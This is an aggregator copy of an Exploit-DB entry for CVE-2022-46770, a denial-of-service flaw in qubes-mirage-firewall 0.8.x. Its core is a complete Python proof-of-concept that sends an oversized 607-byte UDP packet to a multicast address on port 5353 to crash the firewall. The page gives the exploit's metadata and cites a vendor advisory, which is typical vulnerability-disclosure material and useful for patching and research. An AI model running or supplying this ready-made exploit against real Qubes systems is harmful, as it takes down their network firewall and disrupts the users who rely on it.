7

[dos] qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)

 1 year ago
source link: https://www.exploit-db.com/exploits/51157
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)

EDB-ID:

51157

EDB Verified:

Platform:

Hardware

Date:

2023-03-31

Vulnerable App:

# Exploit Title: qubes-mirage-firewall  v0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt <[email protected]>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770

#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166

#!/usr/bin/env python3

from socket import socket, AF_INET, SOCK_DGRAM

TARGET = "239.255.255.250"

PORT = 5353

PAYLOAD = b'a' * 607

s = socket(AF_INET, SOCK_DGRAM)

s.sendto(PAYLOAD, (TARGET, PORT))
            

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK